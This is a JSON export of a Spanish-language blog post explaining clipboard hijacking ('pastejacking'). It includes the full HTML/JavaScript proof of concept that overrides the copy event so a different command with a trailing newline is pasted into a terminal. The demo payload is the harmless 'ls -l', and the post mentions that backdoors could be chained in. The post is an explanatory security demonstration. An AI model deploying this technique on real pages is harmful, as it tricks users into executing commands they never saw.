{"id":1765,"date":"2016-06-15T08:43:49","date_gmt":"2016-06-15T14:43:49","guid":{"rendered":"https:\/\/www.lastdragon.net\/?p=1765"},"modified":"2016-06-15T08:45:27","modified_gmt":"2016-06-15T14:45:27","slug":"hackeando-tu-servidor-o-computadora-desde-el-portapapeles","status":"publish","type":"post","link":"https:\/\/www.lastdragon.net\/?p=1765","title":{"rendered":"Hackeando tu servidor o computadora desde el portapapeles."},"content":{"rendered":"<p>Cuando las paginas empezaba a tener acceso a JavaScript una de las principales funciones que se le dio fue proteger los contenidos de las p\u00e1ginas en internet para que no fueran copiadas, entre esas protecciones estaba la de que, al detectar el evento de copiar al portapapeles, el navegador sobre escribe la informaci\u00f3n copiada con nada, cuando quieres pegar algo no se pegara nada. En otras ocasiones lo que se pegaba era un mensaje que dec\u00eda que estaba prohibido copiar la informaci\u00f3n de la p\u00e1gina WEB.<\/p>\n<p>No falto mucho tiempo para que esa funci\u00f3n se trasladara al lado obscuro, que tal si en lugar de copiar un mensaje de que est\u00e1 prohibido copiar, en lugar de eso se copiaran comandos que pudieran crear script o backdoors en las terminales de los copiaban informaci\u00f3n al portapapeles.<\/p>\n<p>Este tipo de hack es dif\u00edcil de aplicar, pero no imposible, especialmente porque se puede hacer en p\u00e1ginas que tienen manuales ya sea para la consola de Windows o para las de Linux en donde muchas veces se le sugiere al lector copiar al portapapeles y pegar las instrucciones en la consola. Si el sitio es malicioso al hacer esta copia del portapapeles, lo que realmente se copiara seria instrucciones que podr\u00edan instalar aplicaciones o crear usuarios en el sistema o pr\u00e1cticamente cualquier cosa que se pudiera hacer en la Shell<\/p>\n<p><iframe loading=\"lazy\" width=\"560\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/14lmnQgG-7g\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>En la siguiente p\u00e1gina <a href=\"https:\/\/www.lastdragon.net\/misarchivos\/ataqueportapapeles.html\">https:\/\/www.lastdragon.net\/misarchivos\/ataqueportapapeles.html<\/a> podr\u00e1s ver un ejemplo. Copia el contenido de la p\u00e1gina y p\u00e9galo en un bloc de notas, podr\u00e1s ver que lo que copias es una cosa pero lo que pegas es otra muy diferente, en el caso de este ejemplo se pega ls -l es un comando que no causa da\u00f1o, solo lista directorios si se escribe una terminal con Shell bash en GNU\/Linux.<\/p>\n<p><strong>El c\u00f3digo fuente que hace esto ni siquiera es complicado y es el siguiente.<\/strong><\/p>\n<p><code>&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;title&gt;Ataque al portapeles&lt;\/title&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;\/br&gt;<br \/>\n&lt;h2&gt;Cambiar la IP en GNU\/Linux&lt;\/h2&gt;<br \/>\n&lt;p&gt;ifconfig eth0 200.34.35.1 netmask 255.255.255.0&lt;\/p&gt;<br \/>\n&lt;p&gt;Cuando copies el comando ifconfig, en el portapales se copiara ls -s con un retorno de carro, si lo pegas en una termina con GNU\/Linux o algun tipo de Unix se ejecutara sin que puedas evitarlo. Tambien se podrian contatenar los comandos para crear un script que haga un Backdoor o instale algo. Este ataque es al copiar al portapapeles desde el navegador, por lo que si estas en Windows o GNU\/Linux igual sera efectivo.&lt;\/p&gt;<br \/>\n&lt;script&gt;<br \/>\ndocument.addEventListener('copy', function(e){<br \/>\nconsole.log(e);<br \/>\ne.clipboardData.setData('text\/plain', 'ls -l \\n');<br \/>\ne.preventDefault();<br \/>\n});<br \/>\n&lt;\/script&gt;<br \/>\n&lt;\/body&gt;<\/p>\n<p>&lt;\/html&gt;<\/p>\n<p>&nbsp;<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Cuando las paginas empezaba a tener acceso a JavaScript una de las principales funciones que se le dio fue proteger los contenidos de las p\u00e1ginas en internet para que no fueran copiadas, entre esas protecciones estaba la de que, al detectar el evento de copiar al portapapeles, el navegador sobre escribe la informaci\u00f3n copiada con&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1766,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1765","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackers-and-tools"],"_links":{"self":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts\/1765","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1765"}],"version-history":[{"count":2,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts\/1765\/revisions"}],"predecessor-version":[{"id":1768,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts\/1765\/revisions\/1768"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/media\/1766"}],"wp:attachment":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1765"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1765"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1765"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}